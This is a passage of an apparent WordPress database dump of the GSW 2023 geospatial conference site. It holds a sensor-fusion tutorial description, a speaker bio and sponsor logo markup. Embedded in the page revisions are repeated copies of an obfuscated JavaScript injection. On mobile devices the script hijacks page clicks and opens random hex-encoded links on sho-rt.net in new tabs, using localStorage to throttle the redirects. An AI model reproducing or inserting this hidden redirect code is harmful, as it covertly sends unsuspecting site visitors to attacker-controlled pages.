g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Sensor Fusion for Mapping and Navigation','','inherit','closed','closed','','4010-revision-v1','','','2023-08-15 22:39:37','2023-08-15 22:39:37','',4010,'https://gsw2023.com/?p=5210',0,'revision','',0),
(5211,1,'2023-08-15 22:40:25','2023-08-15 22:40:25','[vc_row][vc_column width=\"1/2\"][vc_single_image image=\"4011\" img_size=\"1200x1000\"][vc_column_text]\r\n<h5><strong><span style=\"font-size: 10pt;\">Instructor</span></strong></h5>\r\n<h6><strong><span style=\"font-size: 10pt;\">Speaker: Dr. Mohamed M.R. Mostafa</span></strong></h6>\r\n<h6><strong><span style=\"font-size: 10pt;\">Duration: 1.5 hours</span></strong></h6>\r\n<h6><strong><span style=\"font-size: 10pt;\">Location: ISPRS GSW 2023 – Cairo</span></strong></h6>\r\n[/vc_column_text][dt_team_masonry order=\"asc\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"107\"][vc_column_text]<span style=\"font-size: 14pt;\"><strong><u>Speaker’s Bio</u></strong></span>\r\n<p style=\"text-align: justify;\">Dr. Mohamed M.R. Mostafa is the Lead Technical Authority, Mobile Mapping at Trimble Applanix. Dr.\r\nMostafa obtained his Ph.D. in geomatics engineering from The University of Calgary, Canada in 1999. He\r\nhas 24 years of experience in system design, development, integration, calibration, and quality control\r\nfor airborne, land, and indoor surveying and autonomy applications. He has managed and delivered\r\nprojects in the United States, Canada, Europe, Africa, and the Middle East and has contributed to more\r\nthan 250 technical publications, including the Manual of Photogrammetry 5th edition and the DEM User\r\nManual. He served at the ISPRS, ASPRS, and FIG in different capacities in the last 25 years. He received\r\n11 international awards in the last 30 years.</p>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_column_text]\r\n<h1 class=\"fancy-title entry-title start-animation-done start-animation\">Sensor Fusion for Mapping and Navigation</h1>\r\n<h5><span style=\"text-align: justify;\"><strong>Tutorial Topic</strong></span></h5>\r\n<h5><strong>Abstract:</strong></h5>\r\n<p style=\"text-align: justify;\"><strong>Integrated Sensors enable both Surveying and Autonomy technologies. Self-driving vehicles R&amp;amp;D has been evolving over the past decade. Self-driving depends on several integrated technologies including high-definition mapping &amp;amp; map-based localization. The art and science of mapping along with national and international standards and specifications have resulted in adequate quality mapping products especially in the civilized part of the world for construction, infrastructure, and transportation networks but not satisfactory enough for more critical precision needed for autonomous driving. The developing part of the world lacks the existence of many mapping products let alone high-definition maps.\r\nTherefore, on one hand, the lack of high-definition maps might be an obstacle for self-driving vehicle development.\r\nOn the other hand, sensor technology has significantly evolved in the past few decades. Including:\r\n. Multi-head cameras using oblique/nadir components\r\n. Outstanding LiDAR systems and radar sensors\r\n. The evolution of GPS into GNSS that integrated satellite positioning systems from around the globe\r\n. The evolution of inertial sensor technology due to their successful use in the automotive industry to trigger airbags and even their implementation in cellular phones that led to smaller,lighter weight, higher accuracy, and more economical Inertial measuring units IMU’s.\r\nReaping the benefits of these evolving technologies to address the high-definition mapping challenges is the main scope of this proposed session. Designed to be informative, educational, and interactive, the workshop is designed to address the following Audience categories:\r\n. Decision Makers\r\n. Technicians, Technologists, and Engineers Students\r\nThe workshop will start by addressing the ‘here and now’ technological challenges and their associated solutions as well as the future technological development plans to address that. First, the technological </strong><strong>evolution of film into digital cameras, GPS into GNSS, laser profilers into LiDAR systems, INS into IMU,</strong><strong>etc. will be addressed including the algorithmic evolution of aerotriangulation, SLAM, direct georeferencing (DG) and integrated sensor orientation (ISO). The benefits of integrating all the aforementioned technologies in the form of simultaneous adjustment and mapping (SAM). Then, it will address the integration mechanisms of imaging, LiDAR, radar, inertial and GNSS into not onlygeoreferencing an image or LiDAR range but to also leveraging the precise LiDAR ranges and image pixels to improve the precision of the trajectory in post-processing and real time modes.</strong></p>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Sensor Fusion for Mapping and Navigation','','inherit','closed','closed','','4010-revision-v1','','','2023-08-15 22:40:25','2023-08-15 22:40:25','',4010,'https://gsw2023.com/?p=5211',0,'revision','',0),
(5212,1,'2023-08-15 23:02:23','2023-08-15 23:02:23','<p>[vc_row][vc_column][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #0000ff;\"><strong>Under the Auspices of </strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 115px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081933017{margin-top: 145px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081968974{margin-top: 160px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081968955{margin-top: 115px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081337215{margin-top: 40px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<h4 style=\"text-align: center;\"></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689080719428{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>                    Platinum Sponsors</strong></span></h4>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081395417{margin-top: 10px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner 